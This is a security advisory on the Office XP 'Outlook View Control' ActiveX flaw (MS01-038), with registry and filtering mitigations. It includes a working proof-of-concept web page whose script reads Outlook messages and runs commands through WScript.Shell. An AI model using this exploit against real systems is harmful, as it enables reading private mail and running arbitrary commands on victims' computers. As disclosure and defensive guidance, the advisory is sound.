COMMAND

    MS Office XP

SYSTEMS AFFECTED

    MS Office XP

PROBLEM

    Following is  based on  a Georgi  Guninski security  advisory #49.
    If a user visits a specially  designed html page with IE or  opens
    or previews a  message with Outlook  XP arbitrary commands  may be
    executed on his  computer.  This  may lead to  taking full control
    over user's computer.  Using  another approach to this bug  allows
    reading,  modifying  and  deleting  messages  in user's Outlook XP
    folders.

    The  problem  is  again  ActiveX.   This  time  Office XP seems to
    install  a  malicous  ActiveX  control  -  "Microsoft Outlook View
    Control".  This control  exposes property named "selection"  which
    gives  access  to  user's  mail  messages.   It  also  exposes the
    Outlook  "Application"  object  which  may  lead  to  execution of
    arbitrary programs  of the  user's computer.   Examine the  script
    below for more information.

    This assumes you have at least one message in Outlook XP's Inbox:

        <br>
        <object id="o1" classid="clsid:0006F063-0000-0000-C000-000000000046">
        <param name="folder" value="Inbox">
        </object>

        <script>
        function f()
        {
        //alert(o2.object);
        sel=o1.object.selection;
        vv1=sel.Item(1);
        alert("Subject="+vv1.Subject);
        alert("Body="+vv1.Body+"["+vv1.HTMLBody+"]");
        alert("May be deleted");
        //vv1.Delete();

        vv2=vv1.Session.Application.CreateObject("WScript.Shell");

        alert("Much more fun is possible");


        vv2.Run("C:\\WINNT\\SYSTEM32\\CMD.EXE /c DIR /A /P /S C:\\ ");

        }
        setTimeout("f()",2000);
        </script>

SOLUTION

    Uninstall Office XP  and Windows ;)   Those brave should  take any
    or all of the following steps;

    1. Install the Outlook Email Security Update.

        http://office.microsoft.com/downloads/2000/Out2ksec.aspx

    2. Ensure that Outlook is using the Restricted Sites Zone for  its
       security.
        Outlook XP
        [HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\General]
        "Security Zone"=dword:00000004

        Outlook 2000
        [HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\General]
        "Security Zone"=dword:00000004

        Outlook 98
        [HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Outlook\Options\General]
        "Security Zone"=dword:00000004

    3. Ensure  that  "Run  ActiveX  controls  and plug-ins" is set  to
       Disabled.

    4. Remove or rename the affected control, OUTLCTL.DLL.  This  file
       will likely be found in the;

        \Program Files\Microsoft Office\Office

       directory.  It is not covered by Windows File Protection so  it
       will not automatically be restored.

    5. In Outlook 2000 and Outlook XP environments, establish a client
       rule to automatically handle files  with script in them.   Look
       for keywords such as <script>, <vbscript>, <object, etc...  and
       quarantine or delete them.

    The MS Security Bulletin is MS01-038:

        http://www.microsoft.com/technet/security/bulletin/MS01-038.asp

    has been updated on 16th August and now it contains the fix.